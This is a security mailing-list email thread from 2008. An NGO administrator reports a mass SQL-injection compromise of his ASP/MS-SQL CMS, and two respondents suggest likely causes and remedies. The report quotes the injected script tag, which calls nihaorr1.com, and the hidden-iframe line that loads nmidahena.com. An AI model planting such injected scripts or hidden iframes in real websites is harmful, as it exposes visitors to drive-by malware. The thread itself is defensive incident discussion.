Hi Glenn,
Looks like it can be any number of attack vectors.
Your infrastructures are highly vulnerable (NT and IIS 4) and may
contain lots of vulnerabilities you're not aware of. Moreover, your
custom developed CMS which is probably ASP based may have application
security vulnerabilities. Have you tried to search your user's computers
hosts files for this domain (this may prove as an interesting attack
vector). I would highly recommend segregating this application and its
infrastructure from the internet (If possible).
Best Regards,
Boaz Shunami
Comsec Consulting
-----Original Message-----
From: Jon Oberheide [mailto:jon@oberheide.org]
Sent: Tuesday, April 15, 2008 12:53 AM
To: glenn@elaw.org
Cc: incidents@securityfocus.com
Subject: eSafe quarantine: Re: Mysterious JavaScript appearance in
website database
Looks like an SQL injection attack.
Take a look in your MS-SQL database at the affected entries and I bet
you'll see the nmidahena reference.
Since this is a widespread, automated attack that has affected other
sites, it's unlikely it was targeted at your specific organization or
custom CMS. Give your codebase a thorough audit for SQL injection
vectors.
Regards,
Jon Oberheide
On Mon, 2008-04-14 at 16:03 -0700, Glenn Gillis wrote:
On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
U.S.-based NGO I work for mysteriously had a JavaScript URL appended
to
the titles of much of the content on our website:
<script src=http://www.nihaorr1.com/1.js></script>
NB: the last modified dates for all of the content containing a
reference to this script are identical, right down the 1/100 second.
The contents of the script apparently attempts to open an iframe to a
non-existent domain, "nmidahena.com":
document.writeln("<iframe width=\'10\' height=\'1\'
src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");
I haven't found any reports of a new worm, etc. that might account for
this, but when I Google "nmidahena.com" I get over 100,000 hits for
other sites on which this script is present.
We are running a custom-developed CMS with MS-SQL Server 2000 as the
backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The
NT
Server is fully patched with whatever OS, IIS and SQL Server 2K
hotfixes
released prior to NT4's end-of-life declaration by MS, for what it's
worth.)
Anyone have an idea what might have caused this?
--
Jon Oberheide <jon@oberheide.org>
GnuPG Key: 1024D/F47C17FE
Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE
**********************************************************************************************
IMPORTANT: The contents of this email and any attachments are confidential.
They are intended for the
named recipient(s) only.
If you have received this email in error, please notify the system manager or
the sender immediately and do
not disclose the contents to anyone or make copies thereof.
*** eSafe scanned this email for viruses, vandals, and malicious content. ***
**********************************************************************************************
